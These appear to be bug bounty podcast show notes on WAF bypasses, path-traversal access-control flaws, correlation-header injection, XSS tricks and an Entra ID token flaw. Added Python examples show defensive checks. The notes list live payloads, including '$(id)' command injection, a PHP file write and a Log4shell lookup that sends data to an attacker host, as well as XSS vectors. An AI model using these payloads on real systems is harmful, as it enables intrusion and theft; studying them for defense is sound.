- Critical Thinking - Bug Bounty Podcast
[HackerNotes Ep. 143]: New Cohost + Client-Side Gadgets, LHE Meta — Instant Global Admin in Entra!
In this episode of CTBB podcast Justin brings Brandyn (gr3pme) back to announce him as our newest co-host. We chat about recent LHE experiences, and then break down some news.
Hacker TLDR;
WAF Bypass via Internal Employees: Internal employees may not encounter the same WAF you are. Use blind SSRF to determine if requests are going through WAF by checking response codes.
Secondary Context Bugs: Use path traversal in secondary contexts to manipulate path parameter IDs. If cross-organization bugs aren't found, try within the same organization.
Revisiting X-Correlation Injection: Correlation headers like *-id can expand the attack surface of a target if they are interacting with various contexts within the application. Listen to Episode 86 if you missed it.
Revisiting Archive Alchemist: Specialized tools like Mathias Karlsson's Archive Alchemist for testing archive upload vulnerabilities (Zip Slips, symlink attacks, etc.) can land some nice crits. Listen to Episode 132 if you missed it.
New Gareth Heyes Drop: A technique to smuggle data via the URL using the attributes reference inside HTML tag event handlers: https://x.com/garethheyes/status/1972698006777401801
XSS without () and ;: JavaScript quirks allow you to execute code in some unintuitive ways. Learn why by checking out Huli's new blog post.
LHE Strategy
"Know Your Target": What would hurt, and where would it hurt? And given the scope that is available, what can you do with that?
Don't Brain Dump: Sometimes you can reuse what you learned from previous bugs, or the information those bugs revealed, to inform other vulnerabilities. (In fact, you should if you're looking to optimize your earnings, right?)
The Juice May Be Worth the Squeeze: Although aligning your strengths to the scope can be a winning strategy, a lot of other hackers are likely intimidated by the same things you are. If you can clearly envision impact, delving into uncomfortable territory (whether it be desktop applications, binaries, or mobile apps) may be worth the risk.
Volume or depth?: Should you spend your time trying to submit the most reports, or take the gamble on finding the most impactful one? Ultimately, it's up to what you want to achieve. However, a balanced approach is to start with volume to understand the target, then go deep after the dupe window closes.
Justin's LHE Takeaways: Approved for Pod Disclosure
WAF Bypasses via Internal Members
Internal members may not route through the same WAF as external users, because internal DNS resolves directly to the hosts. This can serve as a payload delivery mechanism if you are able to target internal members of the target organization. If you have a blind SSRF, try to hit a public-facing asset from within the company. If the request reaches the server and doesn't return a 403 response, you'll have confirmed the WAF bypass.
Secondary Context Access Control Bypasses via Path Traversal
If a unique identifier is taken from the URL path, sometimes the access controls are performed by a front-end service while the backend routes on the path it actually receives. Try to reconstruct the path as the backend sees it by using path traversal to replace an identifier you have access to with one you don't have access to (or one where you have lower permissions).
https://app.example.com/users/12345/../67890/profile
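The failure mode above comes down to the front end authorizing on the raw path while the backend routes on the normalized one. The following is an added example, not code from the episode or any project it mentions: a naive prefix check beside a check that canonicalizes the path (percent-decoding, then collapsing "." and ".." segments) before deciding. ALLOWED_USER_ID and the path shapes are constructed for the illustration.

```python
from posixpath import normpath
from typing import Optional
from urllib.parse import unquote

# Constructed: the user id this session is permitted to access.
ALLOWED_USER_ID = "12345"


def authorize_raw(path: str) -> bool:
    """Weak check: decides on the path segment exactly as it was received.

    This mirrors a front-end service that never normalizes, so
    /users/12345/../67890/profile passes because segment 2 is "12345".
    """
    parts = path.strip("/").split("/")
    return len(parts) >= 2 and parts[0] == "users" and parts[1] == ALLOWED_USER_ID


def canonical_path(path: str) -> str:
    """Return the path a typical backend router would actually resolve.

    Percent-decode first (so %2e%2e becomes ..), then collapse dot segments.
    """
    decoded = unquote(path)
    return normpath("/" + decoded.lstrip("/"))


def authorize_canonical(path: str) -> bool:
    """Hardened check: authorize on the same canonical path the backend routes."""
    return authorize_raw(canonical_path(path))


def backend_target_user(path: str) -> Optional[str]:
    """Which user id the backend ends up serving after normalization."""
    parts = canonical_path(path).strip("/").split("/")
    if len(parts) >= 2 and parts[0] == "users":
        return parts[1]
    return None


if __name__ == "__main__":
    for p in ["/users/12345/profile",
              "/users/12345/../67890/profile",
              "/users/12345/%2e%2e/67890/profile"]:
        print(p, "raw:", authorize_raw(p),
              "canonical:", authorize_canonical(p),
              "backend serves:", backend_target_user(p))
```

The design point is that both layers must agree on one canonical form before any identifier is extracted; if the edge cannot normalize exactly the way the backend does, the backend must enforce the access control itself.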
Don't Skip Blackbox Logical Deduction Day
Spend time theorizing about what is occurring on the backend in blackbox scenarios.
Brandyn shouts out Frans Rosen's research into correlation headers as an exemplary case of this.
Slides from Frans Rosen's 2024 Midnight Sun CTF presentation on the topic: X-Correlation-Injections (or How to break server-side context)
Keep a lookout for any mentions of headers that include -id, such as x-request-id. Add them to requests to see if their values are reflected. If so, test for:
Context breaks with ASCII characters:
x-request-id: ' " % & > [ $
Path traversal/arbitrary file write:
x-request-id: .. / var/www/html/< ?=phpinfo()? >.php
Header injection:
x-request-id: 1%0d%0ax-account:456
Header injection (with Java - \u010d → \u000d):
x-request-id: 1%c4%8d%c4%8anew-header: f00
OS Command injection:
x-request-id: $(id)
Log4shell:
x-request-id: $ {jdni :rmi ://x${sys :java.version}.mydomain/a}
JSON Injection:
x-request-id: 1"}. "payload":{"account":"456","foo":"
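From the defending side, the classes listed above are exactly what a correlation-id header should never be allowed to carry into logs, downstream requests or shell/JNDI-style lookups. The block below is an added example, not code from the slides or the episode: it percent-decodes a header value the way a server would, checks it against a strict allowlist, and tags the injection class a rejected value resembles so the event can be logged. The allowlist regex and the class names are constructed for this illustration.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed policy: a well-formed id is short and alphanumeric with a few
# separators. Tighten this to whatever format your own ids actually use.
ALLOWED_ID = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

# U+010D / U+010A are the "Unicode CRLF" pair the episode mentions: some Java
# HTTP stacks narrow them to CR / LF when writing a header back out.
UNICODE_LINE_BREAKS = "\u010d\u010a"


def is_safe_correlation_id(value: str) -> bool:
    """True only for a value that matches the allowlist and has no dot-dot."""
    return bool(ALLOWED_ID.match(value)) and ".." not in value


def classify_suspicious(value: str) -> List[str]:
    """Tag the injection classes a (decoded) header value resembles."""
    findings = []
    if "\r" in value or "\n" in value:
        findings.append("crlf-header-injection")
    if any(ch in value for ch in UNICODE_LINE_BREAKS):
        findings.append("unicode-crlf-header-injection")
    if ".." in value or "/" in value:
        findings.append("path-traversal")
    if "$(" in value or "`" in value:
        findings.append("command-substitution")
    if "${" in value:
        findings.append("expression-lookup")
    if '"' in value:
        findings.append("quote-context-break")
    if any(ch in value for ch in "'%&>[$"):
        findings.append("context-break-chars")
    return findings


def audit_header(raw_value: str) -> Dict[str, object]:
    """Decode a raw header value as received and report safety plus findings."""
    decoded = unquote(raw_value)  # %c4%8d decodes to U+010D via UTF-8
    safe = is_safe_correlation_id(decoded)
    return {
        "decoded": decoded,
        "safe": safe,
        "findings": [] if safe else classify_suspicious(decoded),
    }


if __name__ == "__main__":
    # Constructed sample values, including the page's encoded CRLF variants.
    for v in ["d6f1a2b3-req", "1%0d%0ax-account:456",
              "1%c4%8d%c4%8anew-header: f00", "$(id)", "../var/www/x.php"]:
        print(repr(v), "->", audit_header(v))
```

A reflected header that fails the allowlist should be replaced with a server-generated id rather than echoed, and the rejection (with the decoded value) is worth alerting on, since a CR/LF or U+010D in a correlation id is never accidental.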
In the News
"Babe wake up. Heyes dropped a new payload."
Gareth Heyes posted a payload that leverages the attributes[] reference to reassign attributes in HTML tags. This technique allows you to:
Reassign attributes on the current HTML element.
Use the URL reference to access the document URI inside event handlers.
Smuggle data from the URL hash into JavaScript execution.
<svg onload="attributes[0].value=id+URL+id,new onload" id=`>
<input onfocus="attributes[0].value=id+URL+id,new onfocus" id=` autofocus>
Payload: #${alert(1)}
https://portswigger-labs.net/xss/xss.php?x=%3Cinput%20onclick=attributes[0].value=id%2bid%20id%60%3E#${alert(1)}
+ 2 clicks
Huli's New Blog
Huli posted a new blog, Explaining XSS without parentheses and semi-colons, that breaks down how and why some of the more "exotic" XSS payloads work.
Key points from the blog:
Commas can chain multiple expressions, returning the last one.
Replacing onerror with eval allows you to execute the error message as code. Errors thrown will become part of the error message.
As long as you can turn the error message into valid code, you've succeeded.
Google's SafeContentFrame
Google posted a new blog, Beyond Sandbox Domains: Rendering Untrusted Web Content with SafeContentFrame, that covers how the SafeContentFrame TypeScript library provides a secure way to render untrusted content inside <iframe>s.
The Unstoppable "Mega-Crit"
Dirk-jan Mollema details an incredible Entra ID vulnerability he found in his post: One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens
Entra ID (the rebranded Azure AD) is Microsoft's cloud identity service.
"Actor tokens" are special authentication JWTs that allow services to impersonate users with "god-like permissions".
They are not logged when used, can't be revoked for 24 hours, bypass conditional access policies, and leave no audit trails.
Since the Azure AD Graph API didn't properly validate which tenant the token came from, an attacker could modify the claim fields to craft impersonation tokens for any tenant worldwide, allowing them to impersonate any user in any Entra ID tenant.
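The root cause stated above is a verifier that checks a token's authenticity but not which tenant it belongs to. The following is an added, deliberately generic example and not Microsoft's actor-token format or code: a minimal HMAC-signed token with a tenant-id claim, a verifier that only checks the signature, and one that additionally binds the token to the tenant the request is being served for. The key, claim names (sub, tid) and tenant labels are constructed assumptions.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed signing key shared by the issuer and the resource.
SECRET = b"demo-signing-key-not-for-real-use"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_token(claims: dict, key: bytes = SECRET) -> str:
    """Issue a token of the form <base64url(claims)>.<base64url(hmac)>."""
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = _b64url(hmac.new(key, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def verify_signature_only(token: str, key: bytes = SECRET) -> Optional[dict]:
    """Weak verifier: a valid signature is treated as sufficient.

    A token legitimately issued for one tenant is accepted by a resource in
    any other tenant, which is the shape of the flaw described in the post.
    """
    try:
        body, sig = token.split(".")
    except ValueError:
        return None
    expected = _b64url(hmac.new(key, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None
    return json.loads(_b64url_decode(body))


def verify_for_tenant(token: str, expected_tid: str, key: bytes = SECRET) -> Optional[dict]:
    """Hardened verifier: authenticity AND tenant binding must both hold."""
    claims = verify_signature_only(token, key)
    if claims is None or claims.get("tid") != expected_tid:
        return None
    return claims


if __name__ == "__main__":
    # Constructed: a token issued for tenant-a presented to tenant-b's resource.
    tok = issue_token({"sub": "svc@tenant-a", "tid": "tenant-a"})
    print("signature only :", verify_signature_only(tok))
    print("bound to tenant-b:", verify_for_tenant(tok, "tenant-b"))
    print("bound to tenant-a:", verify_for_tenant(tok, "tenant-a"))
```

The general lesson is that a service-to-service token is a bearer credential, so every resource must check not just that the issuer signed it but that its tenant and audience claims name the resource actually being accessed; a valid signature on a token issued for someone else's tenant is still a valid signature.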
FlareProx
Luke Turvey released FlareProx, an IP rotation tool that deploys Cloudflare Workers as HTTP proxies, meaning you can now use their global CDN infrastructure and IP space to make requests.
It supports all HTTP methods.
100k requests a day are free.
However, if you don't want to pay for other people's fuzzing sessions, make sure to shut it down when you're done.
Caido 101
Aituglo wrote a Caido 101: How To Master It guide to help you migrate from Burp Suite and provides an overview of Caido's features.
View the Get Started documentation section to learn how to install and set up Caido.
New accounts are automatically upgraded to the premium Individual subscription tier for a month for free.
If you are a student, you can get a whole year of the Individual subscription for free!
Keep up-to-date with Caido by viewing the App Roadmap.
In Closing
Justin considers one of the podcast's "North Stars" to be making sure that intermediate to advanced hackers get a takeaway every single week that changes their methodology and makes them a better hacker.
If you're improving every week, we love it.
As always, keep hacking!